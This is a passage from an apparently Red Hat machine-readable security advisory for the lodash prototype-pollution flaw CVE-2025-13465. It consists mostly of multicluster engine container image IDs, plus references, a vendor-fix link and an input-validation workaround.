2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-13465"}, {"category": "external", "summary": "RHBZ#2431740", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465", "url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"}, {"category": "external", "summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"}], "release_date": "2026-01-21T19:05:28.846000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}, {"category": "workaround", "details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 